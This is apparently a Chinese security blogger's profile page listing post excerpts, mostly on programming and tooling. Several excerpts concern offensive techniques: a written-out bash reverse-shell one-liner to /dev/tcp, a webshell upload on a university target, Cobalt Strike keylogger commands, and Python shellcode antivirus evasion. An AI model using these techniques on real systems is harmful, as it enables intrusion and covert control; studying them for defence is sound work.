- 博客(20)
- 收藏
- 关注
RSS订阅原创 快速查找数组中出现奇数次的数字
我觉得甚至都不能说是智力题。这种题目纯看经验,自己做过类似的,就有印象,就能往这个方面去想。人和人的思维方式都不一样,不一定我就能想到你希望我能想到的。首先:result = 0 ,0^2 =2;例如针对 2,2,2,1,2,1,1。可以举个例子理解一下代码执行过程。主要用到了异或的三条性质。
2024-08-22 09:24:01
182
原创 TLS握手过程的深入思考(秋招春招面经)
TLS1.2的大致过程:TLS1.3进行了优化。客户端上来就发送公钥。其实我们还没有谈到双向验证的问题。之前是服务端发送证书给客户端验证 为的是验证服务器的身份。可是客户端的身份怎么验证呢?其实在客户端第一步发送时 就也可以直接发送公钥证书 服务器再验证。第二步 服务器返回hello消息 也带着自己的证书 客户端也进行一个验证。在这前两步 就可以做一个双向的验证。
2024-07-30 17:17:31
1117
原创 linux删除海量文件的一些技巧
或者:(删除当前目录下的jpg) 感觉这个效率高点。此时如果用常规的rm -f -r等命令删除。使用管道符和find命令。发现有500多万条数据。会提示参数列表过长。
2024-07-29 09:52:00
118
原创 一次文件上传漏洞的挖掘的尝试
因为文件上传漏洞大概率拿不到shell,但是可以试试上传脏文件。这样我直接该前端代码,浏览器点击上传文件,选中一个1GB的大文件传,不是很方便吗?但是前端代码只要和jpg有关的我都改为了php,并且js都重写了。我知道浏览器f12改代码仅仅改的静态资源。说不定有的js代码写的判断类型和校验比较隐晦不好搜到。前端改代码就是这样的。(为什么传php因为他的子域名我挖到了phpmyadmin的泄露。访问返回的url即可查看我的php木马文件。这也就获取到了文件上传的目录。抓包看看,点击上传的时候也没有发包。
2024-06-28 10:22:26
540
原创 java版本切换最简单的方法
其实java版本切换非常方便。不需要像python一样还要装一个臃肿的conda。原理其实感觉就是修改了/etc/profile文件 的环境变量。此时选择你想切换的版本 输入对应数字 按回车。以下技巧开发java时是很常用的。
2024-06-25 20:35:06
530
原创 实现一个简易的C语言/C++ 二进制查看器。
但是Binary Viewer最大支持打开4GB的文件。我遇到了一个7GB的文件。用这种查看器的软件查看,还会卡。因为他们可能是直接把所有数据或者大部分读到内存里。这样你一读你的电脑就卡爆。有很多图形化的二进制查看器。比如Binary Viewer。有时候只是想单纯获取一个超大文件的几位二进制而已。可以自己实现一个简易的命令行二进制查看器。随手把自己写的分享过来。
2024-06-25 17:22:36
329
原创 记一次针对edu的src漏洞挖掘
目前高校都越来越重视安全。好点的漏洞都很难挖了。更何况是外校去挖,连登录口令都没有。水洞又不稀罕。说容易挖也容易挖,谷歌黑客语法能有一堆信息泄露。但是是个人都会啊。白忙活。受不了。连个高危漏洞都没交上去。心态崩了。其实也无所谓。这样做应该是对的。因为挖个教育src也不给钱,还不如好好挖挖 挖出个严重漏洞很有成就感,交个中危低危。也不给钱。主要就是抠门导致的。最后不建议上我的本科学校。山东某省属第一的双非。夏天没空调。40度。学习都学不进去。硬件条件很差。很多问题也有。
2024-06-18 23:00:22
905
原创 使用phpstudy搭建DVWA靶场 发现mysql一直无法启动的解决办法
然后你还要去DVWA里改一下mysql端口。把mysql从3306改成3307。可能你有别的应用 也占用这个端口。
2024-06-16 20:08:00
380
原创 docker镜像下载加速的究极解决办法
网上有很多教程可以改代理地址。镜像较大 网速不好时,docker-compose up -d 拉下来还是容易超时。docker拉取镜像、容器 容易超时 原因就不细说了。有一个究极解决办法:用阿里云镜像加速。记得把xxx改成你的地址。
2024-06-08 20:10:14
215
原创 快速看懂linux反弹shell原理
bash -i >& /dev/tcp/6.6.6.6/6666 将文件描述符的1,2(标准输出和标准错误)重定向到tcp连接的一台主机上。0>&1 : 再把标注输入0 重定向到标准输出1,也就是tcp连接的那台主机(因为1 之前就被重定向了)。-i: i就是interactive,bash -i就是创建一个交互式的shell。其中6.6.6.6是ip地址,6666是端口。
2024-06-08 10:53:44
292
原创 c/c++自己写异常处理 运行别人/自己的屎山代码 循环里跑忽略报错、段错误等
实际学习工作时很多人会扔给你屎山代码。可能其中不对长度做校验,可能其中有bug。而你的老师或者老板往往只要结果,只要你跑起来代码 别的不管。由于段错误等是系统级别调用,往往会直接关掉你这个主进程。try catch无法捕捉异常来继续下一个循环。因为当你程序发生异常 实则是操作系统给了你程序一个异常的信号量,让你程序赶紧终止。我们只想在循环里能够把代码跑起来 忽略掉报错的几次。我们捕获这次异常信号, 不让程序退出,跳转进行下一次循环。这里我假设别人的屎山代码封装成了一个函数。
2024-05-30 22:05:23
475
原创 cobalt strike清理缓存
但是注意,这里Reset 其实是把你的历史数据也清了。所以可以先做出 几个report。再reset data。不然,你运行时间长了,每次进去,都要加载很久。
2024-05-20 22:31:48
483
原创 cobalt strike关闭键盘监听
开启方法: bacon中输入:keylogger。默认是开辟随机进程空间。突然发现不知道咋关了 给我服务器卡死了。然后jobkill 对应的<jid>bacon中输入jobs。
2024-05-20 20:48:52
232
1
原创 新大陆:用vim在IDE里代码
你可以参照插件的说明文档,把vim的设置改一改。设置一下他的缩进规则 啊 自动补全啊什么的。你此时可以输入gg和G试一下会不会移动到开头结束。不过注意这样输入法只能英文了。此时你注意的光标和左下角。你需要:VS Code。这样写代码就爽翻天了。
2024-05-11 11:00:37
258
1
原创 安全领域的EDR是什么
那么,该文件就将被标记和隔离,直到确认该过程的安全性。端点威胁检测和响应 (ETDR) 一词是由 Gartner 分析师于 2013 年创造的,他写道:“这个名称反映了端点(相对于网络)、威胁(相对于恶意软件和官方宣布的事件)和工具“主要用于检测和事件响应”该术语于 2015 年更改为 EDR。Gartner 于 2013 年定义了这一术语,被认为是一种面向未来的终端解决方案,以端点为基础,结合终端安全大数据对未知威胁和异常行为进行分析,并作出快速响应,后来被业界通称为端点检测和响应 (EDR)。
2024-05-07 11:01:17
1385
原创 Python shellcode免杀无文件落地
总结:python的免杀在我个人看来已经不推荐了。pyinstaller打包特征过于明显,python本身是高级解释性语言,没有c的底层api 你用Virtual alloc分配内存也特别明显,编译后的exe文件极其容易被查出特征。尽管有时可以过一些杀软,考虑性价比 仍然不推荐用python。你可以尝试改改特征,换个打包工具。应该还是可以有时过掉比较难过的杀软。某数字杀软本身宁错杀勿放过,其次人家有智慧云大脑,这玩意只要被查出来就会上传云上,之后就不免杀。使用pyinstaller打包客户端。
2024-04-23 14:07:35
435
1
原创 Windows最好用的gcc/g++编译器Tmdgcc
今天发现电脑抽风,应该是因为重装的系统太干净了,纯净版win10,很多东西都没有。MinGW应该是最先诞生的。也都是基于gcc的。TDM-GCC是非官方组织提供及维护的编译器集成包。换句话说,他不是由MinGW或MinGW-w64项目官方提供的编译器集成包。而且tmdgcc下载好后,运行安装程序exe,可以一键安装,一键添加到path。例如,TDM-GCC集成了:最新的稳定版本的GCC工具集,一些实用的补丁。我觉得这个是最好用的。运行一些简单的非MFC程序还是可用的。Tmdgcc是最好用的一个编译器。
2024-04-16 21:11:36
555
原创 vmware 为什么桥接模式连不上网的解决办法
原因我不知道,可能kali 虚拟机和vm ware不太兼容 我用的较高版本kali linux。你刚开始那个设置 就相当于一个切换。这里边的三个网卡,就等着被你切出来。这个“自动” 基本不用管。就把这个【自动】换成你的有线网卡。(你可以一开始点击 “还原默认设置” 这样成功率高一些)一个用来桥接 一个用来nat 一个用来仅主机连接。但是呢,怎么解决桥接网卡连不上网的问题呢。今天一天了,发现换个内网就经常这样。你把桥接模式这个虚拟网络,移除掉。你先点击“应用” 在设置桥接模式。基本解决99%的问题。
2024-04-11 22:19:56
1357
2
原创 Burpsuite全局代理抓包
首先这个代理是有很多种的,常见的有上游代理。许多安全工程师常用Xray联动bp,这样可以手动+自动挖洞。那么Xray就是我们的上游代理。一定要保证你的代理工具开启了全局代理模式。但是仅仅开启全局代理是不够的,Bp仍然没有开启代理,你会发现仍然无法抓取谷歌的包。我们要在sock代理中添加你代理软件的端口。这个也主要看你的厂商和代理软件。但是这个不是我们今天的重点。你要知道你所谓的梯子和代理都是socks协议。我这个V2ray是10808端口。在此添加你的上游代理工具即可。有些是7000多端口。
2024-04-01 13:58:30
835
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人